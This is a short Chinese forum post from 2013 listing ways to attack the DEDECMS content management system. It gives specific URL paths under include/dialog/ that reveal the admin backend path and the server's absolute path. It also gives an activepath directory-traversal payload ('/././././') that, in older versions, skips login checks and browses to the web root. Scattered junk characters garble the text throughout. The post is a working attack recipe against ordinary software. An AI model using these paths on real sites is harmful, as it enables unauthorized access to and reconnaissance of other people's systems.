1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
& R1 H4 A4 U' V c- m
2 O" \ x7 Z2 J# W0 j员帐号,新版本的就直接转向了后台.
8 ~2 }8 J5 `# Y) Y5 c* b( T: o3 }* o' `% a
2.include/dialog/config.php会爆出后台管理路径
/ m! M' z! w7 V/ i, h1 b$ i
r1 u" D- g& H7 Q; C2 x3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
- R" D; r$ h+ h* W8 }9 e3 ?5 J
5 R* `* l+ ?+ G4 C9 o4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
% T; I- V' u3 z* ~: k+ e$ s+ }& l3 B% k8 |( D: s, a5 k* S$ ~
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉) A4 p, u, c6 T: z* i
' K) ?7 L# s: v5 x3 m, T到根目录去.不过这些版本的访问地址有些不同., A2 I' U/ o# M
地址为require/dialog/select_soft.php?activepath=/././././././././8 y0 C% T7 P- E. `+ t6 i. A- f
- \' s- A. H) `% ]
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..' }8 D* o* V- j7 @9 |7 p; {, j
存在相同问题的文件还有2 y/ Z2 }/ c9 O% v5 D* ~1 q! T& ?
include\dialog\select_images.php
( C8 `- @% i0 X( V- o4 Uinclude\dialog\select_media.php( p: t; g/ N: b3 }
include\dialog\select_templets.php8 P3 n9 c; q* ]( C8 B
|
发表于 2013-4-16 16:50:43
收藏
支持
反对